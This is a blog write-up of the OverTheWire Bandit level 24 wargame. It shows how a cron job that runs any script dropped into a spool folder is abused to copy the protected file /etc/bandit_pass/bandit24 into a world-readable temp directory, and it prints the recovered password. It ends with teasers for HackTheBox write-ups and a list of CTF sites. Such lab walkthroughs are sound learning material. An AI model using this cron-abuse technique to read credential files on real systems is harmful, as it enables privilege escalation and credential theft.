Skip to main content

Over the Wire - Bandit 24

Bandit 24

Objectives
Level GoalA program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…


Solution

 alets check out the cron.d and see whats there

bandit23@bandit:~$ ls /etc/cron.dcronjob_bandit22  cronjob_bandit23  cronjob_bandit24


cool lets see whats in the cronjob

bandit23@bandit:~$ cat /etc/cron.d/cronjob_bandit24@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null


ok lets check that file in /usr/bin

bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh#!/bin/bash
myname=$(whoami)
cd /var/spool/$mynameecho "Executing and deleting all scripts in /var/spool/$myname:"for i in * .*;do    if [ "$i" != "." -a "$i" != ".." ];    thenecho "Handling $i"timeout -s 9 60 ./$irm -f ./$i    fidone


Ok so this script runs all scripts in the folder and then deletes them  /varspool/bandit24 folder

lets try to write a script that will copy the file in /etc/bandit_pass/bandit24 to a temp directory we create

Now in Python

cp /etc/bandit_pass/bandit24 /tmp/asmithbandit24
chmod -R 777/tmp/asmithbandit24/bandit24

this is a pretty simple script but there are some permission issues we need to over come in order for it to work

first we create the directory /tmp/asmithbandit24
mkdir /tmp/asmithbandit24
Now we need to give bandit24 write access to that folder, which we accomplish by giving everyone all the permissions to that folder :)
chomd -R 777 /tmp/asmithbandit24

Now since we know when we move that file to the /var/spool/bandit24 folder it will deleted it after running. I'm going to create a script in the temp folder we created this script will copy the banditpass file and give everyone all the permissions to that file

vi script.shcp /etc/bandit_pass/bandit24 /tmp/asmithbandit24chmod -R 777 /tmp/asmithbandit24/bandit24


I want to create a copy of this file to give bandti24 access to the file before copyting to the /var/spool/bandit24 folder
cat script.sh >> script1.sh

now I'm going to give bandit24 rights to the file by changing the permission before copying over to /var/spool/bandit24. again I'm going to give everyone all the permissions

chmod -R 777 script1.shcp script1.sh /var/spool/bandit24


now we wait for the cron to execute the script and see if bandit24 shows up in my temp folder

bandit23@bandit:/tmp/asmithbandit24$ lsbandit24  script1.sh  script.sh


there it is let's see what it contains


bandit23@bandit:/tmp/asmithbandit24$ cat bandit24UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ














Comments

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar...

Hack The Box - Retired - Laboratory

HackTheBox - Laboratory - Retired Starting off with a quick scan using threader6000 /opt/threader3000/threader6000.py 10.10.10.216 Ports 22,80,443 came back. Run nmap against these ports. nmap -p22,80,443 -sV -sC -T4 -Pn -oN 10.10.10.216 10.10.10.216 nmap -p22,80,443 -sV -sC -Pn -T4 -oN 10.10.10.216 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 17:43 EDT Nmap scan report for laboratory.htb (10.10.10.216) Host is up (0.060s latency). PORT    STATE SERVICE  VERSION 22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA) |   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA) |_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519) 80/tcp  open  http     Apache httpd 2.4.41 |_...

A collection of online Security CTF and Learning sites

 Hellbound Hackers    Embedded Security CTF Arizona Cyber Warfare Range Over The Wire - Bandit Pico CTF 2018 Hack The Box.eu Root Me: Challenges/Forensic RingZero CTF Vulnerable By Design - Vulnerable VMs Murder Mystery SQL Challenge Incident Response Challenge Authentication Lab Walkthroughs Defcon CTF Archives Matrix Holiday Hack Cyber Defenders | Blue Team and CTF Crypto Hack - learning Crypto Video Learning Zero to Hero Pentesting by The Cyber Mentor